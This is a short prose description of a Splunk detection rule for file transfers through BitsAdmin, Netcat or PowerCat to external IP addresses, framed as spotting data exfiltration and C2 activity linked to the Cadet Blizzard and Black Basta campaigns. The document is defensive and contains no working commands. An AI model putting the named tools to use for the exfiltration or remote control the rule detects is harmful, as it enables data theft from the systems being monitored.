This detection rule is designed to identify potential file transfer activities via various tools like BitsAdmin, Netcat, or PowerCat, which may indicate malicious data exfiltration or command-and-control (C2) activities. The rule captures a range of keywords and command-line options that these tools may generate when performing file transfers. The logic operates within a Splunk environment, utilizing endpoint data and Windows event logs to filter and analyze command executions related to file transfers. It specifically looks for processes that utilize arguments typically associated with file transfer commands, ensuring that the detected IP addresses fall outside of common private IP ranges to identify suspicious external communications. The rule contemporaneously checks for file transfer patterns and records relevant metadata such as timestamps, originating host, user, destination IP, and the nature of the process involved. This makes it particularly effective in monitoring potential exploitation behaviors characteristic of threat actor groups, including those associated with the Cadet Blizzard and Black Basta campaigns.